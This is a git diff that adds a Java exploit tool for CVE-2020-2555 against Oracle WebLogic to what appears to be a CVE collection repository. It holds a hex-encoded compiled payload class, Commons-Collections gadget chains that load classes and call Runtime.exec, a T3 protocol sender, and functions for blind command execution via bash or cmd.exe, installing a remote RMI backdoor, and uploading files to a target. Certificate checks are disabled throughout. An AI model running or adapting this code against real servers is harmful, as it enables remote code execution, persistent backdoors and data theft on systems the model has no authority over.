0010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b01000262720100184c6a6176612f696f2f42756666657265645265616465723b01000273620100184c6a6176612f6c616e672f537472696e674275666665723b0100046c696e650100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b0700ab0700ac0700970700ad07009b0700a101000a536f7572636546696c6501000f52656d6f7465496d706c2e6a6176610c0037003801001f636f6d2f737570657265616d2f7061796c6f61642f52656d6f7465496d706c010005626c696e640700ab0c00ae00af0c0058005901001b6a617661782f6e616d696e672f496e697469616c436f6e74657874010007696e7374616c6c010008737570657265616d0700a90c00b000b1010009756e696e7374616c6c0c00b200b30100136a6176612f6c616e672f457863657074696f6e0100186a6176612f696f2f46696c654f757470757453747265616d0c003700b30c00b400b50c00b600380c00b7003801000a73686f776d65636f64650c00b800af0100096775657373206d653f0c00b900ba0100076f732e6e616d650700bb0c00bc00590c00bd00be01000377696e0c00bf00c00100136a6176612f7574696c2f41727261794c697374010004244e4f240700ac0c00c100c20100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c003700c30c00c400c50c00c600c70100166a6176612f696f2f42756666657265645265616465720100196a6176612f696f2f496e70757453747265616d5265616465720700ad0c00c800c90c003700ca0c003700cb0100166a6176612f6c616e672f537472696e674275666665720c00cc00be0c00cd00ce0100010a0c00cf00be0c00d000be0100106a6176612f6c616e672f4f626a65637401002e7765626c6f6769632f636c75737465722f73696e676c65746f6e2f436c75737465724d617374657252656d6f74650100146a617661782f6e616d696e672f436f6e746578740100186a6176612f726d692f52656d6f7465457863657074696f6e0100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100116a6176612f6c616e672f50726f63657373010010657175616c7349676e6f726543617365010015284c6a6176612f6c616e672f537472696e673b295a010006726562696e64010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b2956010006756e62696e64010015284c6a6176612f6c616e672f537472696e673b29560100057772697465010005285b422956010005666c757368010005636c6f736501000a73746172747357697468010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b0100106a6176612f6c616e672f53797374656d01000b67657450726f706572747901000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b01000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b010018284c6a6176612f696f2f496e70757453747265616d3b2956010013284c6a6176612f696f2f5265616465723b2956010008726561644c696e65010006617070656e6401002c284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275666665723b010008746f537472696e6701000a6765744d6573736167650021000200350001003600000005000100370038000100390000002f00010001000000052ab70001b100000002003a00000006000100000015003b0000000c000100000005003c003d00000009003e003f00010039000000f90003000300000061bb000259b700034c2abe05a000192a03321204b6000599000e2b2a0432b6000657a7003b2abe04a00035bb000759b700084d2a03321209b6000599000f2c120a2bb9000b0300a700162a0332120cb6000599000b2c120ab9000d0200a700044cb100010000005c005f000e0003003a00000032000c0000001a0008001c0019001d0024001e002a001f00320020003d00210049002200540023005c0028005f002600600029003b0000002a00040032002a004000410002000800540042003d000100600000004300440001000000610045004600000047000000160005fc0024070048fc0024070049f900124207004a000001004b004c000200390000003f0000000300000001b100000002003a0000000600010000002f003b00000020000300000001003c003d000000000001004d004e0001000000010045004e0002004f00000004000100500009005100520001003900000090000300030000001bbb000f592ab700104d2c2bb600112cb600122cb60013a700044db10001000000160019000e0003003a0000001e00070000003300090034000e0035001200360016003900190037001a003a003b0000002a00040009000d005300540002001a00000043004400020000001b0055004e00000000001b00560057000100470000000700025907004a0000010058005900020039000002540005000a000000ee2b1214b600159a00061216b02b100ab600174c043d1218b800194e2dc600112db6001a121bb6001c990005033dbb001d59b7001e3a042b121fb6001599001319042b07b60017b90020020057a700441c99002319041221b9002002005719041222b9002002005719042bb90020020057a7002019041223b9002002005719041224b9002002005719042bb90020020057bb0025591904b700263a05190504b60027571905b600283a06bb002959bb002a591906b6002bb7002cb7002d3a07bb002e59b7002f3a081907b60030593a09c6001319081909b600311232b6003157a7ffe81908b60033b04d2cb60034b000020000000b00e8000e000c00e700e8000e0004003a0000006e001b0000004100090042000c00440013004700150048001b0049002b004a002d004d0036004f003f0050004f005100530052005d00530067005400730056007d0057008700580090005b009b005c00a2005d00a9005f00be006000c7006300d2006400e2006700e8006800e90069003b00000070000b001500d3005a005b0002001b00cd005c004e0003003600b2005d005e0004009b004d005f0060000500a9003f00610062000600be002a00630064000700c7002100650066000800cf00190067004e000900e90005004300440002000000ee003c003d0000000000ee004d004e000100680000000c0001003600b2005d0069000400470000004800080cfd00200107006afc002107006b231cff0036000907004807006a0107006a07006b07006c07006d07006e07006f0000fc001a07006aff0005000207004807006a000107004a004f000000040001005000010070000000020071"; + + + private static byte[] serialData(Transformer[] transformers) throws Exception { + final Transformer transformerChain = new ChainedTransformer(transformers); + final Map innerMap = new HashMap(); + // 初始化map 设置laymap + final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + + InvocationHandler handler = (InvocationHandler) Reflections + .getFirstCtor( + "sun.reflect.annotation.AnnotationInvocationHandler") + .newInstance(Override.class, lazyMap); + + final Map mapProxy = Map.class + .cast(Proxy.newProxyInstance(SerialDataGenerator.class.getClassLoader(), + new Class[]{Map.class}, handler)); + + handler = (InvocationHandler) Reflections.getFirstCtor( + "sun.reflect.annotation.AnnotationInvocationHandler") + .newInstance(Override.class, mapProxy); + + Object _handler = BypassPayloadSelector.selectBypass(handler); + return Serializables.serialize(_handler); + } + + private static Transformer[] defineAndLoadPayloadTransformerChain(String className, byte[] clsData, String[] bootArgs) throws Exception { + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(DefiningClassLoader.class), + new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}), + new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}), + new InvokerTransformer("defineClass", + new Class[]{String.class, byte[].class}, new Object[]{className, clsData}), + new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"main", new Class[]{String[].class}}), + new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{bootArgs}}), + new ConstantTransformer(new HashSet())}; + return transformers; + } + + private static Transformer[] uploadTransformerChain(String className, byte[] clsData, String filePath, byte[] content) throws Exception { + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(DefiningClassLoader.class), + new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}), + new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}), + new InvokerTransformer("defineClass", + new Class[]{String.class, byte[].class}, new Object[]{className, clsData}), + new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"uploadFile", new Class[]{String.class, byte[].class}}), + new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{filePath, content}}), + new ConstantTransformer(new HashSet())}; + return transformers; + } + + private static Transformer[] blindExecutePayloadTransformerChain(String[] execArgs) throws Exception { + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[]{ + String.class, Class[].class}, new Object[]{ + "getRuntime", new Class[0]}), + new InvokerTransformer("invoke", new Class[]{ + Object.class, Object[].class}, new Object[]{ + null, new Object[0]}), + new InvokerTransformer("exec", + new Class[]{String[].class}, new Object[]{execArgs}), + new ConstantTransformer(new HashSet())}; + return transformers; + } + + public static byte[] serialRmiDatas(String[] bootArgs) throws Exception { + return serialData(defineAndLoadPayloadTransformerChain(SerialDataGenerator.REMOTE, BytesOperation.hexStringToBytes(SerialDataGenerator.remoteHex), bootArgs)); + } + + public static byte[] serialBlindDatas(String[] execArgs) throws Exception { + return serialData(blindExecutePayloadTransformerChain(execArgs)); + } + + public static byte[] serialUploadDatas(String filePath, byte[] content) throws Exception { + return serialData(uploadTransformerChain(SerialDataGenerator.REMOTE, BytesOperation.hexStringToBytes(SerialDataGenerator.remoteHex), filePath, content)); + } + +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Serializables.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Serializables.java new file mode 100644 index 0000000000000000000000000000000000000000..719a6f04f5adbce397a67526a61bf7cdf7a0b8af --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Serializables.java @@ -0,0 +1,30 @@ +package com.supeream.serial; + +import java.io.*; + +public class Serializables { + + public static byte[] serialize(final Object obj) throws IOException { + final ByteArrayOutputStream out = new ByteArrayOutputStream(); + serialize(obj, out); + return out.toByteArray(); + } + + public static void serialize(final Object obj, final OutputStream out) throws IOException { + final ObjectOutputStream objOut = new ObjectOutputStream(out); + objOut.writeObject(obj); + objOut.flush(); + objOut.close(); + } + + public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException { + final ByteArrayInputStream in = new ByteArrayInputStream(serialized); + return deserialize(in); + } + + public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException { + final ObjectInputStream objIn = new ObjectInputStream(in); + return objIn.readObject(); + } + +} \ No newline at end of file diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/SocketFactory.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/SocketFactory.java new file mode 100644 index 0000000000000000000000000000000000000000..6dd51d122fb06917bbfd47b9b083131b33d09cc6 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/SocketFactory.java @@ -0,0 +1,34 @@ +package com.supeream.ssl; + +import com.supeream.Main; + +import javax.net.ssl.SSLContext; +import javax.net.ssl.SSLSocketFactory; +import javax.net.ssl.TrustManager; +import java.net.Socket; +import java.security.SecureRandom; + +/** + * Created by nike on 17/6/29. + */ +public class SocketFactory { + private SocketFactory() { + } + + public static Socket newSocket(String host, int port) throws Exception { + Socket socket = null; + if (Main.cmdLine.hasOption("https")) { + SSLContext context = SSLContext.getInstance("SSL"); + // 初始化 + context.init(null, + new TrustManager[]{new TrustManagerImpl()}, + new SecureRandom()); + SSLSocketFactory factory = context.getSocketFactory(); + socket = factory.createSocket(host, port); + } else { + socket = new Socket(host, port); + } + + return socket; + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/TrustManagerImpl.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/TrustManagerImpl.java new file mode 100644 index 0000000000000000000000000000000000000000..803374776c2def59c8970b51fe120b1fec9894cb --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/TrustManagerImpl.java @@ -0,0 +1,25 @@ +package com.supeream.ssl; + +import javax.net.ssl.X509TrustManager; +import java.security.cert.CertificateException; +import java.security.cert.X509Certificate; + +/** + * Created by nike on 17/6/29. + */ +public class TrustManagerImpl implements X509TrustManager { + + @Override + public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException { + } + + @Override + public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException { + + } + + @Override + public X509Certificate[] getAcceptedIssuers() { + return null; + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/WeblogicTrustManager.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/WeblogicTrustManager.java new file mode 100644 index 0000000000000000000000000000000000000000..f1641dc93d9ee77e8732a323bec2988d602f7786 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/WeblogicTrustManager.java @@ -0,0 +1,15 @@ +package com.supeream.ssl; + +import weblogic.security.SSL.TrustManager; + +import java.security.cert.X509Certificate; + +/** + * Created by nike on 17/6/29. + */ +public class WeblogicTrustManager implements TrustManager { + @Override + public boolean certificateCallback(X509Certificate[] x509Certificates, int i) { + return true; + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/BypassPayloadSelector.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/BypassPayloadSelector.java new file mode 100644 index 0000000000000000000000000000000000000000..d9839880bdd0441207ccf3b522fda46e433d95fa --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/BypassPayloadSelector.java @@ -0,0 +1,44 @@ +package com.supeream.weblogic; + +import com.supeream.Main; +import com.supeream.serial.Serializables; +import weblogic.corba.utils.MarshalledObject; +import weblogic.jms.common.StreamMessageImpl; + +import java.io.IOException; + +/** + * Created by nike on 17/6/26. + */ +public class BypassPayloadSelector { + + private static Object marshalledObject(Object payload) { + MarshalledObject marshalledObject = null; + try { + marshalledObject = new MarshalledObject(payload); + } catch (IOException e) { + e.printStackTrace(); + } + return marshalledObject; + } + + + public static Object streamMessageImpl(byte[] object) throws Exception { + + StreamMessageImpl streamMessage = new StreamMessageImpl(); + streamMessage.setDataBuffer(object, object.length); + return streamMessage; + } + + public static Object selectBypass(Object payload) throws Exception { + + if (Main.TYPE.equalsIgnoreCase("marshall")) { + payload = marshalledObject(payload); + } else if (Main.TYPE.equalsIgnoreCase("streamMessageImpl")) { + payload = streamMessageImpl(Serializables.serialize(payload)); + } + return payload; + } + + +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/ObjectTest.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/ObjectTest.java new file mode 100644 index 0000000000000000000000000000000000000000..2d9e596c7cd6e9c2595b0b16c457e171aabaff67 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/ObjectTest.java @@ -0,0 +1,27 @@ +package com.supeream.weblogic; + +import com.supeream.serial.BytesOperation; + +import java.io.*; + +/** + * Created by nike on 17/7/11. + */ +public class ObjectTest { + public static void main(String[] args) throws Exception { + + + ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); + ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); + objectOutputStream.writeUTF("xxx"); + String xx = BytesOperation.bytesToHexString(byteArrayOutputStream.toByteArray()); + System.out.println(xx); + byte[] cons = BytesOperation.hexStringToBytes(xx); + + + + ByteArrayInputStream bis = new ByteArrayInputStream(cons); + ObjectInputStream objectInputStream = new ObjectInputStream(bis); + objectInputStream.readObject(); + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3ProtocolOperation.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3ProtocolOperation.java new file mode 100644 index 0000000000000000000000000000000000000000..c0302756c99c2bfedfa47ae41bbe57108429d932 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3ProtocolOperation.java @@ -0,0 +1,130 @@ +package com.supeream.weblogic; + +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by Fernflower decompiler) +// + +import com.supeream.Main; +import com.supeream.serial.BytesOperation; +import com.supeream.serial.Serializables; +import com.supeream.ssl.SocketFactory; +import weblogic.rjvm.JVMID; +import weblogic.security.acl.internal.AuthenticatedUser; + +import java.io.BufferedReader; +import java.io.InputStreamReader; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.net.InetAddress; +import java.net.Socket; + +public class T3ProtocolOperation { + + + public static void send(String host, String port, byte[] payload) throws Exception { + Socket s = SocketFactory.newSocket(host, Integer.parseInt(port)); + //AS ABBREV_TABLE_SIZE HL remoteHeaderLength 鐢ㄦ潵鍋歴kip鐨� + String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n"; + + if (Main.cmdLine.hasOption("https")) { + header = "t3s 7.0.0.0\nAS:10\nHL:19\n\n"; + } + + s.getOutputStream().write(header.getBytes()); + s.getOutputStream().flush(); + BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream())); + String versionInfo = br.readLine(); + if (Main.version == null) { + versionInfo = versionInfo.replace("HELO:", ""); + versionInfo = versionInfo.replace(".false", ""); + System.out.println("weblogic version:" + versionInfo); + Main.version = versionInfo; + } +// String asInfo = br.readLine(); +// String hlInfo = br.readLine(); +// System.out.println(versionInfo+"\n"+asInfo+"\n"+hlInfo); + + //cmd=1,QOS=1,flags=1,responseId=4,invokableId=4,abbrevOffset=4,countLength=1,capacityLength=1 + + //t3 protocol + String cmd = "08"; + String qos = "65"; + String flags = "01"; + String responseId = "ffffffff"; + String invokableId = "ffffffff"; + String abbrevOffset = "00000000"; + String countLength = "01"; + String capacityLength = "10";//蹇呴』澶т簬涓婇潰璁剧疆鐨凙S鍊� + String readObjectType = "00";//00 object deserial 01 ascii + + StringBuilder datas = new StringBuilder(); + datas.append(cmd); + datas.append(qos); + datas.append(flags); + datas.append(responseId); + datas.append(invokableId); + datas.append(abbrevOffset); + + //because of 2 times deserial + countLength = "04"; + datas.append(countLength); + + //define execute operation + String pahse1Str = BytesOperation.bytesToHexString(payload); + datas.append(capacityLength); + datas.append(readObjectType); + datas.append(pahse1Str); + + //for compatiable fo hide + //for compatiable fo hide + AuthenticatedUser authenticatedUser = new AuthenticatedUser("weblogic", "admin123"); + String phase4 = BytesOperation.bytesToHexString(Serializables.serialize(authenticatedUser)); + datas.append(capacityLength); + datas.append(readObjectType); + datas.append(phase4); + + JVMID src = new JVMID(); + + Constructor constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class); + constructor.setAccessible(true); + src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false); + Field serverName = src.getClass().getDeclaredField("differentiator"); + serverName.setAccessible(true); + serverName.set(src,1); + + datas.append(capacityLength); + datas.append(readObjectType); + datas.append(BytesOperation.bytesToHexString(Serializables.serialize(src))); + + JVMID dst = new JVMID(); + + constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class); + constructor.setAccessible(true); + src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false); + serverName = src.getClass().getDeclaredField("differentiator"); + serverName.setAccessible(true); + serverName.set(dst,1); + datas.append(capacityLength); + datas.append(readObjectType); + datas.append(BytesOperation.bytesToHexString(Serializables.serialize(dst))); + + byte[] headers = BytesOperation.hexStringToBytes(datas.toString()); + int len = headers.length + 4; + String hexLen = Integer.toHexString(len); + StringBuilder dataLen = new StringBuilder(); + + if (hexLen.length() < 8) { + for (int i = 0; i < (8 - hexLen.length()); i++) { + dataLen.append("0"); + } + } + + dataLen.append(hexLen); + s.getOutputStream().write(BytesOperation.hexStringToBytes(dataLen + datas.toString())); + s.getOutputStream().flush(); + s.close(); + + } + +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3Test.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3Test.java new file mode 100644 index 0000000000000000000000000000000000000000..d8efa1bc54d9da735631565b745fee8113361b34 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3Test.java @@ -0,0 +1,224 @@ +package com.supeream.weblogic; + +import com.supeream.Main; +import com.supeream.payload.RemoteImpl; +import com.supeream.serial.BytesOperation; +import com.supeream.serial.SerialDataGenerator; +import com.supeream.serial.Serializables; +import com.supeream.ssl.SocketFactory; +import org.apache.commons.cli.CommandLineParser; +import org.apache.commons.cli.DefaultParser; +import org.apache.commons.cli.Options; +import weblogic.apache.org.apache.velocity.runtime.Runtime; +import weblogic.cluster.singleton.ClusterMasterRemote; +import weblogic.jndi.internal.NamingNode; +import weblogic.protocol.Identity; +import weblogic.rjvm.JVMID; +import weblogic.rmi.cluster.ClusterableRemoteObject; +import weblogic.rmi.cluster.ReplicaAwareRemoteObject; +import weblogic.security.acl.internal.AuthenticatedUser; + +import javax.naming.Context; +import javax.naming.InitialContext; +import javax.naming.NamingEnumeration; +import java.io.*; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.net.Inet4Address; +import java.net.InetAddress; +import java.net.Socket; +import java.rmi.Remote; + +/** + * Created by nike on 17/6/28. + */ +public class T3Test { + + public static void main(String[] args) throws Exception { + + +// Options options = new Options(); +// options.addOption("https",false,"xx"); +// CommandLineParser parser = new DefaultParser(); +// Main.cmdLine = parser.parse(options, args); +// +// Socket s = SocketFactory.newSocket("77.246.34.226", 443); +// //AS ABBREV_TABLE_SIZE HL remoteHeaderLength 鐢ㄦ潵鍋歴kip鐨� +// String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n"; +// s.getOutputStream().write(header.getBytes()); +// s.getOutputStream().flush(); +// BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream())); +// String versionInfo = br.readLine(); +// String asInfo = br.readLine(); +// String hlInfo = br.readLine(); +// +// System.out.println(versionInfo + "\n" + asInfo + "\n" + hlInfo); + +// +// //cmd=1,QOS=1,flags=1,responseId=4,invokableId=4,abbrevOffset=4,countLength=1,capacityLength=1 +// +// +// //t3 protocol +// String cmd = "09"; +// String qos = "65"; +// String flags = "01"; +// String responseId = "ffffffff"; +// String invokableId = "ffffffff"; +// String abbrevOffset = "00000022";//16+3=19+4+4+1=28+1+1+5348=5378-4=000014fe 30+8-4 +// +// +// String countLength = "02"; +// String capacityLength = "10";//蹇呴』澶т簬涓婇潰璁剧疆鐨凙S鍊� +// String readObjectType = "00";//00 object deserial 01 ascii +// +// StringBuilder dataS = new StringBuilder(); +// dataS.append(cmd); +// dataS.append(qos); +// dataS.append(flags); +// dataS.append(responseId); +// dataS.append(invokableId); +// dataS.append(abbrevOffset); +// +// //RemotePeriodLength +// dataS.append("00000001"); +// //PublickeySize +// dataS.append("00000001"); +// System.out.println(Integer.toHexString(115)); +// dataS.append("0001"); +// +// byte[] phase1 = Serializables.serialize(new File("/etc/passwd")); +// System.out.println("payloadlength="+(phase1.length)); +// String pahse1Str = BytesOperation.bytesToHexString(phase1); +// System.out.println("pahse1Str="+pahse1Str); +// dataS.append(pahse1Str.substring(8)); +// +// countLength = "04"; +// dataS.append(countLength); +// +// +// //define IRemote.class class by byte[] +//// byte[] phase1 = SerialDataGenerator.serialRmiDatas(new String[]{"install"}); +//// String pahse1Str = BytesOperation.bytesToHexString(phase1); +//// datas.append(capacityLength); +//// datas.append(readObjectType); +//// datas.append(pahse1Str); +// +// +// +// //for compatiable fo hide +// Class x = Class.forName("weblogic.rjvm.ClassTableEntry"); +// +// Class xxf = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); +// ObjectStreamClass objectStreamClass = ObjectStreamClass.lookup(xxf); +// Constructor f = x.getDeclaredConstructor(ObjectStreamClass.class, String.class); +// +// f.setAccessible(true); +// Object xx = f.newInstance(objectStreamClass,""); +// +// String phase41 = BytesOperation.bytesToHexString(Serializables.serialize(xx)); +// dataS.append(capacityLength); +// dataS.append(readObjectType); +// dataS.append(phase41); +// +// +// //for compatiable fo hide +// AuthenticatedUser authenticatedUser = new AuthenticatedUser("weblogic", "admin123"); +// String phase4 = BytesOperation.bytesToHexString(Serializables.serialize(authenticatedUser)); +// dataS.append(capacityLength); +// dataS.append(readObjectType); +// dataS.append(phase4); +// +// JVMID dst = new JVMID(); +// +// Constructor constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class); +// constructor.setAccessible(true); +// dst = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false); +// Field serverName = dst.getClass().getDeclaredField("differentiator"); +// serverName.setAccessible(true); +// serverName.set(dst,0); +// +// serverName = dst.getClass().getDeclaredField("transientIdentity"); +// serverName.setAccessible(true); +// serverName.set(dst,new Identity(1000l)); +// +// dataS.append(capacityLength); +// dataS.append(readObjectType); +// dataS.append(BytesOperation.bytesToHexString(Serializables.serialize(dst))); +// +// JVMID src = new JVMID(); +// +// constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class); +// constructor.setAccessible(true); +// src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false); +// serverName = src.getClass().getDeclaredField("differentiator"); +// serverName.setAccessible(true); +// serverName.set(dst,0); +// +// serverName = src.getClass().getDeclaredField("transientIdentity"); +// serverName.setAccessible(true); +// serverName.set(src,new Identity(1000l)); +// +// dataS.append(capacityLength); +// dataS.append(readObjectType); +// dataS.append(BytesOperation.bytesToHexString(Serializables.serialize(src))); +// +// +// +//// RemotePeriodLength +// int remotePeriodLength = Integer.MAX_VALUE; +// ByteArrayOutputStream bos = new ByteArrayOutputStream(); +// DataOutputStream dos = new DataOutputStream(bos); +// dos.writeInt(remotePeriodLength); +// dos.flush(); +// dos.close(); +// System.out.println(BytesOperation.bytesToHexString(bos.toByteArray())); +// +// System.out.println(dataS.toString()); +// +// byte[] headers = BytesOperation.hexStringToBytes(dataS.toString()); +// +// +// int len = headers.length + 4; +// String hexLen = Integer.toHexString(len); +// +// StringBuilder dataLen = new StringBuilder(); +// if (hexLen.length() < 8) { +// for (int i = 0; i < (8 - hexLen.length()); i++) { +// dataLen.append("0"); +// } +// } +// +// dataLen.append(hexLen); +// System.out.println("length="+dataLen); +// +// s.getOutputStream().write(BytesOperation.hexStringToBytes(dataLen + dataS.toString())); +// s.getOutputStream().flush(); +// +// System.out.println("result="+br.readLine()); +// s.close(); + + System.setProperty("weblogic.rjvm.enableprotocolswitch","true"); + System.setProperty("UseSunHttpHandler","true"); + System.setProperty("ssl.SocketFactory.provider" , "sun.security.ssl.SSLSocketFactoryImpl"); + System.setProperty("ssl.ServerSocketFactory.provider" , "sun.security.ssl.SSLSocketFactoryImpl"); + + + + Context initialContext = Main.getInitialContext("t3s://" + "127.0.0.1" + ":" + 7001); +// Context initialContext = Main.getInitialContext("t3://" + "10.211.55.5" + ":" + 7001); + +// NamingNode remote = (NamingNode) initialContext.lookup("weblogic"); +// System.out.println(remote.toString()); + +// System.out.println(initialContext.); + System.out.println(initialContext.getEnvironment()); + NamingEnumeration namingEnumeration = initialContext.list(""); + while (namingEnumeration.hasMoreElements()) { + System.out.println(namingEnumeration.next().getClass().getName()); + + } + +// weblogic.jndi.internal.WLContextImpl serverNamingNode = (weblogic.jndi.internal.WLContextImpl) initialContext.lookup("weblogic"); + + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/WebLogicOperation.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/WebLogicOperation.java new file mode 100644 index 0000000000000000000000000000000000000000..215abd47e03b100d3a51d02442ae33b9e4dfcb01 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/WebLogicOperation.java @@ -0,0 +1,47 @@ +package com.supeream.weblogic; + +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by Fernflower decompiler) +// + +import com.supeream.Main; +import com.supeream.serial.SerialDataGenerator; +import com.supeream.serial.Serializables; + +public class WebLogicOperation { + + public static void installRmi(String host, String port) throws Exception { + byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"install"}); + T3ProtocolOperation.send(host, port, payload); + } + + public static void unInstallRmi(String host, String port) throws Exception { + byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"uninstall"}); + T3ProtocolOperation.send(host, port, payload); + } + + public static void blind(String host, String port) throws Exception { + byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"blind", Main.cmdLine.getOptionValue("C")}); + T3ProtocolOperation.send(host, port, payload); + } + + public static void uploadFile(String host, String port, String filePath, byte[] content) throws Exception { + byte[] payload = SerialDataGenerator.serialUploadDatas(filePath, content); + T3ProtocolOperation.send(host, port, payload); + } + + public static void blindExecute(String host, String port, String cmd) throws Exception { + String[] cmds = new String[]{cmd}; + if (Main.cmdLine.hasOption("os")) { + if (Main.cmdLine.getOptionValue("os").equalsIgnoreCase("linux")) { + cmds = new String[]{"/bin/bash", "-c", cmd}; + } else { + cmds = new String[]{"cmd.exe", "/c", cmd}; + } + } + byte[] payload = SerialDataGenerator.serialBlindDatas(cmds); + T3ProtocolOperation.send(host, port, payload); + } + +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/test.ser b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/test.ser new file mode 100644 index 0000000000000000000000000000000000000000..b6550e59e887d6035da4ff1529705237fce39c51 Binary files /dev/null and b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/test.ser differ diff --git a/cve/Oracle/2020/yaml/CVE-2020-2555.yaml b/cve/Oracle/2020/yaml/CVE-2020-2555.yaml new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" index 1de85f71f54e22f3e557618d5ad800d42ff653e7..c8143c64f770309c20570d2b3819db2707b8f0f1 100644 --- 